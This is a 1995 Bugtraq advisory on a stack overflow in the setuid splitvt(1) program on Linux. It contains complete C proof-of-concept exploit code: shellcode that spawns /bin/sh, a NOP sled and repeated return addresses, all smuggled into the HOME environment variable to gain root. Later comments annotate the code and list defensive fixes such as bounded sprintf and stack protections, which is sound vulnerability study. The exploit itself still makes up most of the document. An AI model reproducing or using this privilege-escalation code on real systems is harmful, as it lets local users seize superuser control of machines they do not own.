- To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
- Subject: Avalon Release
- From: root <root@crimson.cadvision.com.crimelab.com>
- Date: Sun, 3 Dec 1995 22:52:37 -0700
- Approved-By: CHASIN@CRIMELAB.COM
- Approved-By: root <root@CRIMSON.CADVISION.COM.CRIMELAB.COM>
- In-Reply-To: <199512040028.TAA06752@tarsier.cv.nrao.edu>
- Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
- Sender: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
Avalon Security Research Release 1.3 (splitvt) Affected Program: splitvt(1) Affected Operating Systems: Linux 2-3.X Exploitation Result: Local users can obtain superuser privileges. Bug Synopsis: A stack overflow exists via unbounded, unchecked user-supplied data passed to a sprintf(). Syntax: crimson~$ cc -o sp sp.c crimson~$ sp bash$ sp bash$ splitvt bash# whoami root Credit: Full credit for this bug (both the research and the code) goes to Dave G. & Vic M. Any questions should be directed to mcpheea@cadvision.com .
/*
 * Historical (1995) proof-of-concept for the splitvt(1) stack overflow
 * described in the message above. Reproduced as posted; the comments below
 * describe what the code does and what a defender should take from it.
 *
 * Vulnerability class: a privileged program formats environment-derived data
 * into a fixed-size stack buffer with an unbounded sprintf(). The fix on the
 * target side is a bounded format (snprintf with the destination size) and
 * not trusting the length of inherited environment variables in setuid code.
 * Non-executable stacks, ASLR and stack protectors are the generic
 * mitigations for this class; an abnormally long HOME value in a setuid
 * process's environment is the observable artifact of this specific PoC.
 */

/* Returns the current stack pointer.
 * There is no C `return`: the value arrives only because the asm leaves it
 * in %eax, which is the i386 return register. Falling off the end of a
 * non-void function whose result is then used is undefined behavior in
 * standard C; this only works on i386 with GCC-style inline asm. */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }

/* Implicit-int main (pre-C99 style).
 * Builds one environment string "HOME=<repeated address><NOP bytes><payload>"
 * in eggplant, installs it with putenv(), then spawns a shell that inherits
 * it; the message above then runs the vulnerable program from that shell.
 * putenv() stores the pointer to eggplant rather than copying it, which is
 * only safe here because eggplant (a local of main) outlives the system()
 * call. No headers are included, so putenv() and system() are implicitly
 * declared (implicit declarations were removed in C99). */
main() {
    char eggplant[2048]; /* roughly 5 + 264 + 64 + 50 bytes used on i386; plenty of room */
    int a;
    char *egg;
    long *egg2;
    /* Machine-code payload as posted (opaque bytes, not annotated here);
     * the string visibly ends in "/bin/sh". */
    char realegg[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    char *eggie = realegg;
    egg = eggplant;
    /* "HOME=" prefix, written byte by byte. */
    *(egg++) = 'H';
    *(egg++) = 'O';
    *(egg++) = 'M';
    *(egg++) = 'E';
    *(egg++) = '=';
    /* Writes (256+8)/4 = 66 longs (264 bytes with 4-byte long) of the same
     * address: the caller's %esp plus a hard-coded offset. egg points 5 bytes
     * into a char array, so each long store is misaligned -- tolerated on
     * x86, undefined per the standard. The 0x3d0 + 0x30 constant is
     * presumably tuned to one specific binary/stack layout, which is what
     * makes a PoC like this fragile across builds. get_esp() is re-called
     * on every iteration but yields the same value each time. */
    egg2 = (long *)egg;
    for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
    egg=(char *)egg2;
    /* 0x40 bytes of 0x90 (the i386 NOP opcode); 0x90 into a signed char is
     * an implementation-defined conversion, harmless on the intended target. */
    for (a=0;a<0x40;a++) *(egg++) = 0x90;
    /* Copy the payload up to, not including, its NUL terminator. */
    while (*eggie) *(egg++) = *(eggie++);
    *egg = 0; /* terminate eggplant! -- putenv() needs a NUL-terminated string */
    /* Install HOME in this process's environment; the pointer, not a copy, is kept. */
    putenv(eggplant);
    /* Spawn an interactive shell that inherits the crafted environment. */
    system("/bin/bash");
}